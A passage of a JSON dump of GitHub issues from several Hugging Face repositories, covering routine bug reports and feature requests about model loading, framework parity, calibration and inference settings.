\u4e0b\u8f7d\u6587\u4ef6\u5e76\u4fdd\u5b58\u5230\u672c\u5730\u8def\u5f84\n     * @param fileUrl \u8981\u4e0b\u8f7d\u7684\u6587\u4ef6\u7684 URL\n     * @param savePath \u672c\u5730\u4fdd\u5b58\u7684\u6587\u4ef6\u8def\u5f84\n     * @throws IOException \u5982\u679c\u5728\u4e0b\u8f7d\u6216\u4fdd\u5b58\u6587\u4ef6\u8fc7\u7a0b\u4e2d\u53d1\u751f I/O \u9519\u8bef\n     */\n    public static void downloadFile(String fileUrl, String savePath) throws IOException {\n        URL url = new URL(fileUrl);\n\n        try (BufferedInputStream in = new BufferedInputStream(url.openStream());\n             FileOutputStream fileOutputStream = new FileOutputStream(savePath)) {\n            System.out.println(\": \" + savePath);\n            byte[] dataBuffer = new byte[1024];\n            int bytesRead;\n            while ((bytesRead = in.read(dataBuffer, 0, 1024)) != -1) {\n                fileOutputStream.write(dataBuffer, 0, bytesRead);\n            }\n        }\n    }\n}\n\n```",
    "url": "https://github.com/huggingface/huggingface_hub/issues/3117",
    "state": "open",
    "labels": [],
    "created_at": "2025-05-26T10:00:25Z",
    "updated_at": "2025-06-15T14:55:48Z",
    "user": "mullerhai"
  },
  {
    "repo": "huggingface/agents-course",
    "number": 510,
    "title": "anyone can run unit 1 dumm agent notebook????",
    "body": "\"Image\"",
    "url": "https://github.com/huggingface/agents-course/issues/510",
    "state": "closed",
    "labels": [
      "question"
    ],
    "created_at": "2025-05-25T03:00:04Z",
    "updated_at": "2025-06-25T09:03:52Z",
    "user": "chaoshun2025"
  },
  {
    "repo": "huggingface/transformers",
    "number": 38346,
    "title": "Why is return_assistant_tokens_mask and continue_final_message incompatible?",
    "body": "I'm currently authoring a new chat template, and while debugging encountered the check for this, however when uncommenting the check, the resulting mask and template both seem to still be correct. So I'm curious as to why or whether this check is needed at all?\n\nI can see it was introduced in [the original PR](https://github.com/huggingface/transformers/pull/33198), however there doesn't seem to be any justification/explanation for this assertion.",
    "url": "https://github.com/huggingface/transformers/issues/38346",
    "state": "closed",
    "labels": [],
    "created_at": "2025-05-24T23:44:13Z",
    "updated_at": "2025-07-02T08:03:11Z",
    "comments": 2,
    "user": "nyxkrage"
  },
  {
    "repo": "huggingface/candle",
    "number": 2967,
    "title": "Logit Discrepancy Between Candle and PyTorch When Using XLM-RoBERTa Model",
    "body": "When running the same XLM-RoBERTa model (`s-nlp/xlmr_formality_classifier` - [HF](https://huggingface.co/s-nlp/xlmr_formality_classifier) ) in both Candle and PyTorch, I'm observing significant differences in the logits produced by the model's classification head for identical inputs. Is this expected behavior? See [this repository](https://github.com/jpe90/candle-pytorch-parity-testing/tree/master/xlm-roberta-finetuned) for a reproduction.\n\n## Environment/Setup\n\n- Model: `s-nlp/xlmr_formality_classifier` \n- Candle version: 0.9.1\n- Model SHA256: `66037d963856d6d001f3109d2b3cf95c76bce677947e66f426299c89bc1b58e7`\n- OS: macOS\n\n## Observed Behavior\n\nGiven identical inputs, the logits produced by Candle and PyTorch differ significantly:\n\n**Candle logits:**\n```\n[[2.0820313, -1.7548828], [0.7783203, -0.5629883], [1.2871094, -1.0039063], [2.1601563, -1.9277344]]\n```\n\n**PyTorch logits:**\n```\n[[ 2.6433, -2.3445],\n [ 1.0379, -0.9621],\n [ 1.4154, -1.2704],\n [ 3.4423, -3.1726]]\n```\n\n## Expected Behavior\n\nI would expect the logits to be extremely close (within floating-point precision differences) when running the same model with identical inputs across different frameworks.\n\n## Steps to Reproduce\n\n1. Clone the repository: https://github.com/jpe90/candle-pytorch-parity-testing\n2. Run the PyTorch implementation in `/xlm-roberta-finetuned/pytorch/main.py`\n3. Run the Candle implementation in `/xlm-roberta-finetuned/candle/src/main.rs`\n4. Compare the logits produced by both implementations\n\n## Additional Context\n\n- The tokenization appears to be identical between both implementations (identical token IDs)\n- I checked and made sure model checksums match at runtime\n- Config seems to match ([see here](https://github.com/jpe90/candle-pytorch-parity-testing/blob/master/xlm-roberta-finetuned/troubleshooting.md))\n\n## Questions\n\n1. Should I expect identical (or very close) logits between PyTorch and Candle implementations?\n2. If differences are expected, what is the acceptable range of variation?\n3. Could these differences impact more sensitive applications that rely on logit values rather than just the final classifications?\n4. Are there known issues with XLM-RoBERTa models specifically in Candle?\n",
    "url": "https://github.com/huggingface/candle/issues/2967",
    "state": "closed",
    "labels": [],
    "created_at": "2025-05-24T17:24:33Z",
    "updated_at": "2025-05-26T10:45:24Z",
    "comments": 2,
    "user": "jpe90"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 11607,
    "title": "with a custom attention processor for Flux.dev, inference time changes when manually load and inject the transformer model into a flux pipeline versus let the flux pipeline constructor load the transformer internally.",
    "body": "With a custom attention processor for Flux.dev transformer, the inference time is different between the following two ways:\n\n1. Manually load and inject the transformer into a flux.dev pipeline\n\n2. Let the pipeline constructor load the transformer internally\n\nThe inference time of the first way is about 15% slower than second way.\nWhat is the reason?\nI built diffusers from the source code.\nAny insights are appreciated!",
    "url": "https://github.com/huggingface/diffusers/issues/11607",
    "state": "closed",
    "labels": [],
    "created_at": "2025-05-24T06:42:11Z",
    "updated_at": "2025-05-26T01:27:00Z",
    "comments": 1,
    "user": "LinchuanXuTheSEAAI"
  },
  {
    "repo": "huggingface/transformers",
    "number": 38326,
    "title": "Allow `MllamaModel` to accept `pixel_values` and `inputs_embeds`",
    "body": "### Feature request\n\n`MllamaModel` does not allow users to pass `pixel_values` and `inputs_embeds` simultaneously:\nhttps://github.com/huggingface/transformers/blob/54cd86708d2b63a1f696ee1c59384a2f04100f57/src/transformers/models/mllama/modeling_mllama.py#L1702-L1705\n\nHowever, commenting out those lines and running the follow script does generate the same logits:\n```python\nimport torch\nfrom transformers import MllamaForConditionalGeneration, AutoProcessor\n\n\nmodel_id = \"meta-llama/Llama-3.2-11B-Vision-Instruct\"\nmodel = MllamaForConditionalGeneration.from_pretrained(\n    model_id, device_map=\"auto\", torch_dtype=torch.bfloat16\n)\nprocessor = AutoProcessor.from_pretrained(model_id)\n\nmessages = [\n    [\n        {\n            \"role\": \"user\",\n            \"content\": [\n                {\n                    \"type\": \"image\",\n                    \"url\": \"https://llava-vl.github.io/static/images/view.jpg\",\n                },\n                {\"type\": \"text\", \"text\": \"What does the image show?\"},\n            ],\n        }\n    ],\n]\ninputs = processor.apply_chat_template(\n    messages,\n    add_generation_prompt=True,\n    tokenize=True,\n    return_dict=True,\n    return_tensors=\"pt\",\n).to(model.device)\n\noutputs = model(**inputs)\n\n# Manually compute inputs_embeds\ninput_ids = inputs.pop(\"input_ids\")\ninputs_embeds = model.get_input_embeddings()(input_ids)\nnew_outputs = model(inputs_embeds=inputs_embeds, **inputs)\nassert torch.allclose(outputs.logits, new_outputs.logits)\n```\n\n### Motivation\n\nBeing able to pass `inputs_embeds` along with `pixel_values` enables soft embeddings to be passed to the model in addition to images, which is useful for prompt tuning.\n\n### Your contribution\n\nCould contribute a PR removing the check assuming there isn't something I'm unaware of about the check.",
    "url": "https://github.com/huggingface/transformers/issues/38326",
    "state": "closed",
    "labels": [
      "Feature request"
    ],
    "created_at": "2025-05-23T15:26:28Z",
    "updated_at": "2025-05-27T16:33:57Z",
    "comments": 1,
    "user": "dxoigmn"
  },
  {
    "repo": "huggingface/transformers",
    "number": 38323,
    "title": "`PYTHONOPTIMIZE=2` seems not work with `transformers-`based library",
    "body": "### System Info\n\nI am currently having the latest package install.\ntorch 2.6.0+cu124\ntransformers 4.51.3\nsentence-transformers 4.1.0\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nError:\n\n```python\nFile \"\", line 488, in _call_with_frames_removed\n  File \"D:\\Dataset\\AgentAI\\.venv\\Lib\\site-packages\\transformers\\modeling_utils.py\", line 5494, in \n    class SQuADHead(nn.Module):\n    ...<113 lines>...\n                    )\n  File \"D:\\Dataset\\AgentAI\\.venv\\Lib\\site-packages\\transformers\\modeling_utils.py\", line 5513, in SQuADHead\n    @replace_return_docstrings(output_type=SquadHeadOutput, config_class=PretrainedConfig)\n     ~~~~~~~~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n  File \"D:\\Dataset\\AgentAI\\.venv\\Lib\\site-packages\\transformers\\utils\\doc.py\", line 1194, in docstring_decorator\n    lines = func_doc.split(\"\\n\")\n            ^^^^^^^^^^^^^^\nAttributeError: 'NoneType' object has no attribute 'split'\n```\n\nA simple reproduction:\n\n```python\nfrom sentence_transformers import SentenceTransformer\n\nmodel = SentenceTransformer('all-MiniLM-L6-v2')\n\nembedding = model.encode(\"What is the capital of France?\")\nprint(embedding.shape)\n```\n\n### Expected behavior\n\nThis is not actually an issue, but I expect a documentation update from `transformers` maintainer to any end-users who use or develop a `transformers-` based library on the function `replace_return_docstrings` at `src/transformers/utils/doc.py` is to don't strip out the docstring by switching the option `PYTHONOPTIMIZE=2` to reduce the size of the bytecode. The use of `PYTHONOPTIMIZE=1` is OK\n\nThe reason is that the function `replace_return_docstrings` is expecting to be a decorator function without supporting the case of empty docstring. In some case, such as web hosting on Docker or production environment, or hosting an LLM without tool call where we usually strip out the docstring. \n\nIn the reproduction above (my use-case), I am just need to run the RAG search and thus don't need the docstring to be there.",
    "url": "https://github.com/huggingface/transformers/issues/38323",
    "state": "closed",
    "labels": [
      "bug"
    ],
    "created_at": "2025-05-23T14:24:34Z",
    "updated_at": "2025-05-26T14:29:17Z",
    "comments": 1,
    "user": "IchiruTake"
  },
  {
    "repo": "huggingface/candle",
    "number": 2965,
    "title": "Are there any support for complex number?",
    "body": "Are there any support for complex number?",
    "url": "https://github.com/huggingface/candle/issues/2965",
    "state": "closed",
    "labels": [],
    "created_at": "2025-05-23T09:33:47Z",
    "updated_at": "2025-11-23T22:16:54Z",
    "comments": 1,
    "user": "hndrbrm"
  },
  {
    "repo": "huggingface/accelerate",
    "number": 3586,
    "title": "Where is PartialState._shared_state initialized?",
    "body": "Hi! When I step through the code line by line, before this line ([entering into `__init__` of `AcceleratorState`](https://github.com/huggingface/accelerate/blob/v0.34.2/src/accelerate/state.py#L856 )) , `PartialState._shared_state`returns\n```\n{}\n```\nBut after entering into `__init__` of `AcceleratorState`, `PartialState._shared_state`returns\n```\n{'_cpu': False, 'backend': 'nccl', 'device': device(type='cuda', index=0), 'debug': False, 'distributed_type': , 'num_processes': 1, 'process_index': 0, 'local_process_index': 0, 'fork_launched': False}\n``` \nI'm wondering where is `PartialState._shared_state` initialized?",
    "url": "https://github.com/huggingface/accelerate/issues/3586",
    "state": "closed",
    "labels": [],
    "created_at": "2025-05-23T08:17:44Z",
    "updated_at": "2025-06-30T15:08:15Z",
    "user": "SonicZun"
  },
  {
    "repo": "huggingface/transformers",
    "number": 38300,
    "title": "Will Gemma 3n be added to transformers?",
    "body": "### Model description\n\nQuestion: Are there plans from Google or Huggingface to implement Gemma 3n in other frameworks?\n\nI've seen the LiteRT weights and Android App Link on Huggingface, and was wandering if it would be possible to convert the model architecture in the *.task file to a transformer pytorch Module?\n\nPersonally I'll really interested in the Per-Layer Embeddings and MatFormer implementation they used, but do not have any experience with Tensorflow Lite\n\n### Open source status\n\n- [ ] The model implementation is available\n- [X] The model weights are available\n\n### Provide useful links for the implementation\n\nhttps://huggingface.co/google/gemma-3n-E4B-it-litert-preview",
    "url": "https://github.com/huggingface/transformers/issues/38300",
    "state": "closed",
    "labels": [
      "New model"
    ],
    "created_at": "2025-05-22T15:26:20Z",
    "updated_at": "2025-06-30T07:07:53Z",
    "comments": 4,
    "user": "TheMrCodes"
  },
  {
    "repo": "huggingface/transformers",
    "number": 38281,
    "title": "KeyError in Llama-4-Maverick-17B-128E-Instruct-FP8 Inference with Offloading",
    "body": "### Issue Description\nLoading `meta-llama/Llama-4-Maverick-17B-128E-Instruct-FP8` succeeds with `transformers==4.51.0`, but inference fails with `KeyError: 'model.layers.37.feed_forward.experts.gate_up_proj'` during `model.generate`. This occurs on 4x NVIDIA RTX A6000 (~196GB VRAM, CUDA 12.4, Python 3.12.3, Ubuntu 24.04.2) with offloading, critical for sentiment analysis (~100\u2013150GB/day, ~85\u201390% accuracy). Disabling MoE (`num_experts=0`) didn\u2019t resolve it.\n\n### Steps to Reproduce\n1. Install dependencies:\n   ```bash\n   pip install torch==2.4.1 accelerate==1.7.0 compressed-tensors==0.9.4 transformers==4.51.0\n\n2. Confirm model files (~389GB, 84 .safetensors) at /mnt/data/ai_super_palace/models/llama4/.\n\n3. Run:\nimport os\nimport torch\nfrom transformers import AutoModelForCausalLM, AutoTokenizer\nos.environ[\"TORCHVISION_DISABLE_NMS\"] = \"1\"\nmodel = AutoModelForCausalLM.from_pretrained(\n    '/mnt/data/ai_super_palace/models/llama4',\n    torch_dtype=torch.float16,\n    device_map=\"auto\",\n    low_cpu_mem_usage=True,\n    offload_folder=\"/mnt/data/ai_super_palace/models/llama4/offload\",\n    config={\"parallel_style\": \"none\"}\n)\ntokenizer = AutoTokenizer.from_pretrained('/mnt/data/ai_super_palace/models/llama4')\nprompt = \"What is the sentiment of this text: 'I love this product, it's amazing!'\"\ninputs = tokenizer(prompt, return_tensors=\"pt\").to(model.device)\noutputs = model.generate(**inputs, max_new_tokens=50)\nprint(tokenizer.decode(outputs[0], skip_special_tokens=True))\n\n4. Error:\nKeyError: 'model.layers.37.feed_forward.experts.gate_up_proj'\n\n**Environment**\nTransformers: 4.51.0\nPython: 3.12.3\nPyTorch: 2.4.1\nCUDA: 12.4\nAccelerate: 1.7.0\nCompressed-tensors: 0.9.4\nOS: Ubuntu 24.04.2 LTS\nHardware: 4x NVIDIA RTX A6000 (~196GB VRAM)\nModel: meta-llama/Llama-4-Maverick-17B-128E-Instruct-FP8\n\n**Additional Details**\nModel card requires transformers>=4.51.0, supports FP8 via compressed-tensors.\nWarnings: Uninitialized MoE weights (feed_forward.experts.*), offloaded parameters (VRAM limit).\nPrior errors (TypeError: NoneType not iterable) resolved with config={\"parallel_style\": \"none\"}.\nSuspect bug in accelerate offloading or MoE weight initialization.\n\n**Request**\nIs this a known llama4 MoE offloading issue?\nCan MoE weights be initialized or offloading fixed?\nWorkaround for inference without re-downloading (~389GB)?\nUrgent for sentiment analysis.\n\n**Logs**\nSee traceback above. config.json (40KB) available.\n\nThank you!\n\n\n\n\n\n\n\n\n\n\n\n\n",
    "url": "https://github.com/huggingface/transformers/issues/38281",
    "state": "closed",
    "labels": [],
    "created_at": "2025-05-22T05:45:30Z",
    "updated_at": "2025-07-27T08:03:11Z",
    "comments": 4,
    "user": "pchu2025"
  },
  {
    "repo": "huggingface/transformers",
    "number": 38268,
    "title": "Group beam search with sampling?",
    "body": "### Feature request\n\nIn the current generation code, group beam search is necessarily greedy. From a theoretical point of view, it is not very clear why that should be the case, since the diversity penalty is applied on the logits anyway, yielding a full distribution from which sampling can still be performed.\n\n### Motivation\n\nI think there is a reasonable use case for such a feature: diversity beam search is very useful in particular for modalities like biological sequences which increasingly use the transformers library, but I could see it be useful as well for natural language or code, to generate diverse paths without falling to the drawbacks of greedy generation. From a more abstract point of view it is also seemingly unjustified to allow sampling for standard beam search and not for diversity beam search.\n\n### Your contribution\n\nI am aware of the work in #30810 so don't want to disrupt but would be happy to look into it.",
    "url": "https://github.com/huggingface/transformers/issues/38268",
    "state": "open",
    "labels": [
      "Feature request"
    ],
    "created_at": "2025-05-21T18:08:59Z",
    "updated_at": "2025-06-06T18:11:13Z",
    "comments": 4,
    "user": "adrian-valente"
  },
  {
    "repo": "huggingface/candle",
    "number": 2961,
    "title": "Shape Mismatch in MatMul During Forward Pass of ModernBertForSequenceClassification",
    "body": "ModernBertForSequenceClassification model (hidden size = 768, sequence length = 128) to categorize text into one of classes. During the initial training epoch, however, the forward pass fails with a \u201cshape mismatch in matmul\u201d error.\nIs there any way to solve this?\n\n\n #Error log\nTokenized shape: [4, 128]\nAttention mask shape: [4, 128]\nInput IDs shape: [4, 128]\nAttention mask shape: [4, 128]\nFirst sample token count: 128\nError in forward pass: shape mismatch in matmul, lhs: [4, 128], rhs: [768, 768]\nInput shape: [4, 128], Attention mask shape: [4, 128]\nError: shape mismatch in matmul, lhs: [4, 128], rhs: [768, 768]\n\n\n#Expected Behavior\n    Input IDs should be a tensor of shape (batch_size, sequence_length) whose values are token indices (integers) and which the embedding layer then projects into the model\u2019s hidden dimension (hidden_size = 768) before any matrix multiplication with weight matrices of shape (768, 768)\n    The forward pass should succeed without dimension errors, yielding logits of shape (batch_size, num_classes).\n\n\n#Code\n\n```\nuse candle_core::{Device, Tensor, D, DType, Error};\nuse candle_nn::{ops, loss,  VarBuilder, optim::{Optimizer},var_map::VarMap};\nuse candle_transformers::models::modernbert::{ClassifierConfig, ClassifierPooling, ModernBertForSequenceClassification,Config\n};\nuse hf_hub::{api::sync::Api, Repo, RepoType};\nuse tokenizers::{PaddingParams, Tokenizer};\nuse std::collections::HashMap;\nuse candle_optimisers::adam::{ParamsAdam, Adam};\nuse rand::{seq::SliceRandom, SeedableRng};\nuse rand::rngs::StdRng;\n// Training settings\nconst LEARNING_RATE: f64 = 2e-5;\nconst EPOCHS: usize = 5;\nconst BATCH_SIZE: usize = 8;\nconst SEQ_LEN: usize = 128; // Sequence length\nconst SEED: u64 = 42;\n\n// Data structure for text and label mapping\ntype LabeledDataset = HashMap;\n\n\nfn main() -> Result<(), Box> {\n    // Device selection (CPU or GPU)\n    let device = candle_examples::device(true)?;\n    println!(\"Using device: {:?}\", device);\n    \n    // HuggingFace API configuration\n    let revision = \"main\".to_string();\n    let api = Api::new()?;\n    let model_id = \"answerdotai/ModernBERT-base\".to_string();\n    let repo = api.repo(Repo::with_revision(\n        model_id,\n        RepoType::Model,\n        revision,\n    ));\n\n    // Load tokenizer and model configuration\n    let tokenizer_filename = repo.get(\"tokenizer.json\")?;\n    let config_filename = repo.get(\"config.json\")?;\n    let weights_filename = repo.get(\"model.safetensors\")?;\n    \n    // Load configuration file\n    let config = std::fs::read_to_string(config_filename)?;\n    let mut config: Config = serde_json::from_str(&config)?;\n    \n    // Output model configuration\n    println!(\"Model config:\");\n    println!(\"  Hidden size: {}\", config.hidden_size);\n    println!(\"  Intermediate size: {}\", config.intermediate_size);\n    println!(\"  Max position embeddings: {}\", config.max_position_embeddings);\n    println!(\"  Num attention heads: {}\", config.num_attention_heads);\n    println!(\"  Num hidden layers: {}\", config.num_hidden_layers);\n    println!(\"  Vocab size: {}\", config.vocab_size);\n\n    \n    // Check configuration compatibility\n    if config.max_position_embeddings < SEQ_LEN {\n        println!(\"Warning: SEQ_LEN ({}) is larger than max_position_embeddings ({}), adjusting SEQ_LEN\",\n                SEQ_LEN, config.max_position_embeddings);\n    }\n    \n    // Initialize tokenizer\n    let mut tokenizer = Tokenizer::from_file(tokenizer_filename).map_err(Error::msg)?;\n    \n    // Padding and truncation settings\n    tokenizer\n        .with_padding(Some(PaddingParams {\n            strategy: tokenizers::PaddingStrategy::Fixed(SEQ_LEN),\n            pad_id: config.pad_token_id,\n            pad_token: \"[PAD]\".to_string(),\n            pad_type_id: 0,\n            pad_to_multiple_of: None,\n            direction: tokenizers::PaddingDirection::Right,\n        }))\n        .with_truncation(Some(tokenizers::TruncationParams {\n            max_length: SEQ_LEN,\n            strategy: tokenizers::TruncationStrategy::LongestFirst,\n            stride: 0,\n            direction: tokenizers::TruncationDirection::Right,\n        }))\n        .map_err(Error::msg)?;\n\n    // Configure label mappings\n    let mut id2label = HashMap::new();\n    let mut label2id = HashMap::new();\n\n    let class_names = vec![\"News\", \"Entertainment\", \"Sports\", \"Technology\"];\n    for (i, name) in class_names.iter().enumerate() {\n        id2label.insert(i.to_string(), name.to_string());\n        label2id.insert(name.to_string(), i.to_string());\n    }\n    \n    // Add classifier configuration\n    config.classifier_config = Some(ClassifierConfig {\n        id2label: id2label.clone(),\n        label2id: label2id.clone(),\n        classifier_pooling: ClassifierPooling::CLS, // Use [CLS] token for pooling\n    });\n\n    // Create variable map for the model\n    let mut varmap = VarMap::new();\n    // Load model weights\n    varmap.load(weights_filename)?;\n    let vb = VarBuilder::from_varmap(&varmap",
    "url": "https://github.com/huggingface/candle/issues/2961",
    "state": "closed",
    "labels": [],
    "created_at": "2025-05-21T14:25:07Z",
    "updated_at": "2025-06-08T12:11:46Z",
    "comments": 2,
    "user": "whitebox2"
  },
  {
    "repo": "huggingface/transformers",
    "number": 38243,
    "title": "",
    "body": "We are looking for an experienced Machine Learning Engineer for a BTC/USDT prediction project using CNN, LSTM, and Transformers. The goal is to forecast cryptocurrency price movements with a target accuracy of 90%+.\n\nMore details here:[ ](https://gist.github.com/DandBman/c76a548b1972da50ffe6bbdd93fdd613)",
    "url": "https://github.com/huggingface/transformers/issues/38243",
    "state": "closed",
    "labels": [],
    "created_at": "2025-05-20T22:14:11Z",
    "updated_at": "2025-05-21T13:14:41Z",
    "comments": 0,
    "user": "DandBman"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 11590,
    "title": "Infinite (not literally) length video creation using LTX-Video?",
    "body": "First of all thanks to Aryan (0.9.7 integration) and DN6 (adding GGUF). Model is quite good and output is also promising.\n\nI need help in creating continuous video using the last frame. 1 trick is to generate the video, extract the last frame and do inference. Is there any easy way where I can do this in loop.\n\nMy thought is \n\n1. Use text encoder to generate prompt embed once and then remove text encoders from memory\n2. Loop the inference code, once complete extract the last latent (preferred as I can upscale using LTXLatentUpsamplePipeline) frame or image and again create image1 and condition with that frame...and continue doing this for n iterations.\n3. Also need to save the video locally for each inference, otherwise OOM.\n\nAny thoughts / suggestions?\n\n```python\nimport torch\nimport gc\nfrom diffusers import GGUFQuantizationConfig\nfrom diffusers import LTXConditionPipeline, LTXLatentUpsamplePipeline, LTXVideoTransformer3DModel\nfrom diffusers.pipelines.ltx.pipeline_ltx_condition import LTXVideoCondition\nfrom diffusers.utils import export_to_video, load_video, load_image\n\ntransformer_path = f\"https://huggingface.co/wsbagnsv1/ltxv-13b-0.9.7-distilled-GGUF/blob/main/ltxv-13b-0.9.7-distilled-Q3_K_S.gguf\"\n# transformer_path = f\"https://huggingface.co/wsbagnsv1/ltxv-13b-0.9.7-distilled-GGUF/blob/main/ltxv-13b-0.9.7-distilled-Q8_0.gguf\"\ntransformer_gguf = LTXVideoTransformer3DModel.from_single_file(\n    transformer_path,\n    quantization_config=GGUFQuantizationConfig(compute_dtype=torch.bfloat16),\n    torch_dtype=torch.bfloat16,\n)\n\npipe = LTXConditionPipeline.from_pretrained(\n    \"Lightricks/LTX-Video-0.9.7-distilled\", \n    transformer=transformer_gguf,\n    torch_dtype=torch.bfloat16\n)\n# pipe.to(\"cuda\")\n# pipe.enable_sequential_cpu_offload()\npipe.enable_model_cpu_offload()\npipe.vae.enable_tiling()\n\nheight, width = 480, 832\nnum_frames = 151\nnegative_prompt = \"worst quality, inconsistent motion, blurry, jittery, distorted\"\n\nprompt = \"hyperrealistic digital artwork of a young woman walking confidently down a garden pathway, wearing white button-up blouse with puffed sleeves and blue denim miniskirt, long flowing light brown hair caught in gentle breeze, carrying a small black handbag, bright sunny day with blue sky and fluffy white clouds, lush green hedges and ornamental plants lining the stone pathway, traditional Asian-inspired architecture in background, photorealistic style with perfect lighting, unreal engine 5, ray tracing, 16K UHD. camera follows subject from front as she walks forward with elegant confidence\"\nimage1 = load_image( \"assets/ltx/00039.png\" )\ncondition1 = LTXVideoCondition(\n    image=image1,\n    frame_index=0,\n)\nwidth=512\nheight=768\nnum_frames = 161\n\n# LOOP HERE\nlatents = pipe(\n    prompt=prompt,\n    negative_prompt=negative_prompt,\n    conditions=[condition1],\n    width=width,\n    height=height,\n    num_frames=num_frames,\n    guidance_scale=1.0,\n    num_inference_steps=4,\n    decode_timestep=0.05,\n    decode_noise_scale=0.025,\n    image_cond_noise_scale=0.0,\n    guidance_rescale=0.7,\n    generator=torch.Generator().manual_seed(42),\n    output_type=\"latent\",\n).frames\n# save video locally\n# Update image1 = load_image( latent/image from current inference  to be used with next inference)\n\n```",
    "url": "https://github.com/huggingface/diffusers/issues/11590",
    "state": "closed",
    "labels": [],
    "created_at": "2025-05-20T13:37:36Z",
    "updated_at": "2025-05-20T19:51:20Z",
    "comments": 1,
    "user": "nitinmukesh"
  },
  {
    "repo": "huggingface/agents-course",
    "number": 501,
    "title": "[BUG] Notebook on HF Hub is not updated",
    "body": "\"Workflows in LlamaIndex\" [course page](https://huggingface.co/learn/agents-course/unit2/llama-index/workflows#creating-workflows) is referring notebook on [HF Hub](https://huggingface.co/agents-course/notebooks/blob/main/unit2/llama-index/workflows.ipynb), which is not the updated version from [GitHub](https://github.com/huggingface/agents-course/blob/main/notebooks/unit2/llama-index/workflows.ipynb). \n\nThe old version contains bug in loop event workflow so update is needed. ",
    "url": "https://github.com/huggingface/agents-course/issues/501",
    "state": "closed",
    "labels": [
      "question"
    ],
    "created_at": "2025-05-20T06:45:26Z",
    "updated_at": "2025-05-29T05:28:46Z",
    "user": "karenwky"
  },
  {
    "repo": "huggingface/open-r1",
    "number": 649,
    "title": "how to evaluate use local models and datasets?",
    "body": "I change the readme eval command like following: \n\n**MODEL=./deepseek-ai/DeepSeek-R1-Distill-Qwen-1.5B\nMODEL_ARGS=\"pretrained=$MODEL,dtype=bfloat16,max_model_length=32768,gpu_memory_utilization=0.8,generation_parameters={max_new_tokens:32768,temperature:0.6,top_p:0.95}\"\nOUTPUT_DIR=./data/evals/\n\n# AIME 2024\nTASK=aime24\nlighteval vllm $MODEL_ARGS \"custom|$TASK|0|0\" \\\n    --custom-tasks src/open_r1/evaluate.py \\\n    --use-chat-template \\\n    --output-dir $OUTPUT_DIR \\\n    --cache-dir ./datasets/aime24**\n\nbut it try to use the network,and get a network error,how can i do to solve this problem?",
    "url": "https://github.com/huggingface/open-r1/issues/649",
    "state": "open",
    "labels": [],
    "created_at": "2025-05-20T05:57:29Z",
    "updated_at": "2025-05-20T05:57:29Z",
    "user": "SiqingHe"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 1130,
    "title": "Drive mode reversed on calibration.",
    "body": "I had an issue where after calibrating drive_mode was reversed for one of my motors (0 vs. 1) as a result, moving the leader in one direction caused the follower to go the opposite direction.\n\nSaw some suggestions that moving it through the full range of motion resolved this but I wasn't able to get that to work. I could also see cases where this could be problematic during initial setup. @Lemin2 suggested to always set this to 0 across the board, which does seem like a good fix, unless there's a reason want to control reverse mode. \n\nIn any case I would expect the calibration process to be consistent for both arms, else this issue will be encountered. If reverse mode is needed maybe have a step in the calibration processes to ensure consistency.\n\nFYI in case anyone encounters this the solution is to go into `.cache/calibration//.json`\n\nSeems to be the same cause for #441 and #930 ",
    "url": "https://github.com/huggingface/lerobot/issues/1130",
    "state": "open",
    "labels": [
      "bug",
      "question",
      "robots"
    ],
    "created_at": "2025-05-20T03:08:06Z",
    "updated_at": "2025-07-16T06:50:20Z",
    "user": "brainwavecoder9"
  },
  {
    "repo": "huggingface/text-generation-inference",
    "number": 3233,
    "title": "Docker image For llama cpp backend?",
    "body": "Hey,\nIs there any reason in particular why docker images for the llama-cpp backend do not get built along with new versions? It seems the backend has been ready for a while so just curious why images don't get built as part of the build pipeline\ncc @mfuntowicz ",
    "url": "https://github.com/huggingface/text-generation-inference/issues/3233",
    "state": "open",
    "labels": [],
    "created_at": "2025-05-20T02:07:46Z",
    "updated_at": "2025-05-20T02:07:46Z",
    "comments": 0,
    "user": "vrdn-23"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 11580,
    "title": "Can diffusers support loading and running FLUX with fp8 ?",
    "body": "This is how I use diffusers to load flux model:\n```\nimport torch\nfrom diffusers import FluxPipeline\npipe = FluxPipeline.from_pretrained(\n    \"/ckptstorage/repo/pretrained_weights/black-forest-labs/FLUX.1-dev\", \n    torch_dtype=torch.float16,\n)\ndevice = torch.device(f\"cuda:{device_number}\" if torch.cuda.is_available() else \"cpu\")\npipe = pipe.to(device)\n```\nit consumes about 75 seconds on my computer with A800 GPU.\nBut I found in comfyui, it only need 22 seconds to load flux model, but it load the fp8 model.\nCan diffusers load flux fp8 model ?\nor is there any other speed up method ?",
    "url": "https://github.com/huggingface/diffusers/issues/11580",
    "state": "open",
    "labels": [],
    "created_at": "2025-05-19T12:18:13Z",
    "updated_at": "2025-12-12T19:30:33Z",
    "comments": 5,
    "user": "EmmaThompson123"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 1124,
    "title": "How to add force data to lerobot and models?",
    "body": "As title said, I use a force sensor on SO100 arm and want to record the data in lerobot dataset then train with the force data. How to do it?\n\nforce data looks like: a list: [x1, y1, z1, x2, y2, z2, x3, y3, z3, x4, y4, z4, x5, y5, z5] (15 d list)\n\nThanks!",
    "url": "https://github.com/huggingface/lerobot/issues/1124",
    "state": "closed",
    "labels": [],
    "created_at": "2025-05-19T07:48:20Z",
    "updated_at": "2025-05-19T13:36:44Z",
    "user": "milong26"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 11575,
    "title": "Hidream Model loading takes too long \u2014 any way to speed it up?",
    "body": "Hi, thanks for this great project.\n\nI'm running Hidream with this library in a serverless environment and facing major delays during model loading. It can be very frustrating, especially for time-sensitive or ephemeral deployments.\n\nI've tried everything I could think of to reduce the loading time, but nothing has worked so far. Does anyone have any tips, tricks, or even sample code to help speed up the model initialization?\n\nAny guidance would be greatly appreciated!",
    "url": "https://github.com/huggingface/diffusers/issues/11575",
    "state": "open",
    "labels": [],
    "created_at": "2025-05-19T00:49:00Z",
    "updated_at": "2025-05-23T12:55:05Z",
    "comments": 6,
    "user": "Me-verner"
  },
  {
